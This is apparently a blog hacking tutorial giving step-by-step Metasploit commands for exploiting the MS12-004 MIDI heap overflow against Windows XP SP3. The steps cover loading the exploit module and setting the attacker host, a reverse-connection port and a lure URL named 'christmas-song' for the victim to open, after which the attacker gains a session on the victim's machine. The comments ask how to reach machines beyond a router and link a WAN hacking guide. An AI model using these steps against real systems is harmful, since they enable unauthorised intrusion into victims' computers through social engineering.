4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow

4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow


Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R1

Victim O.S : Windows XP SP3

Vulnerable Application : Windows Multimedia Library (winmm.dll)

Exploit Credits : Shane Garrett, Juan Vazquez, Sinn3r

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files.  Remote code execution can be achieved by using Windows Media Player's ActiveX control.

Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either "inc al" or "dec al" a byte.  This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user.

At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention).

Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Requirements :

1. Metasploit Framework (Windows/Linux)

2. ms12_004_midi.rb exploit (download link )




Step by Step :

Attacker IP Address :

Victim IP Address :

1. Download the exploit above and then copy to destination folder by using following command :

cp ms12_004_midi.rb /pentest/exploits/framework/modules/exploits/windows/browser/

2. Run your metasploit framework using msfconsole command and then use the exploit you've just added on step 1.

4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow

3. On the next step you can view available switch by running show options command. In this example below only important switch to make exploit running without problem.

4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow

Information :

set srvhost --> attacker server host(attacker ip address)

set srvport 80 --> set local port that open to receive connection from victim

set uripath christmas-song --> social engineering links

set lhost --> set lhost ip address to receive payload

set lport 443 --> set local port to receive payload connection from victim

exploit --> run the exploit --> link to send to victim

4. When victim open malicious link, our backtrack console shows active session and we can get into their computer ๐Ÿ™‚

4 Steps Hacking XP SP3 MS12-004 midiOutPlayNextPolyEvent Heap Overflow


Countermeasures :

1. Always update your windows. If you're using Win XP, you can migrate to windows 7.

Hope you enjoyed ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 1,134 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • osettobubu


    Funziona tutto alla Grande… solo che se notiamo tutto è fatto nella LAN locale in LocalHost , il tutto sarebbe bello farlo in OUT-SIDE … o meglio dal pc remoto verso un atro IP, ma quello che sembra il problema è come fare il Bay-Pass del Router per entrare nella Lan e vedere i PC?

    • v4L

      Sorry I can’t wrote italian language ๐Ÿ˜€ you can refer my tutorial here about how to hack from WAN http://www./computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

    • Reginald Melorius Please

      No, non puoi farlo da internet per via del router/firewall che, come hai intuito, molto probabilmente bloccherebbe i pacchetti in arrivo.

      No, you cannot do that from the internet because of the router/firewall that very likely would block the incoming packets.

      • v4L


  • aric

    Download SecurityTube Metasploit Framework Expert DVD FREE Enjoy ๐Ÿ˜‰ securitytube-training.com/certifications/securitytube-metasploit-framework-expert/?id=download ๐Ÿ˜‰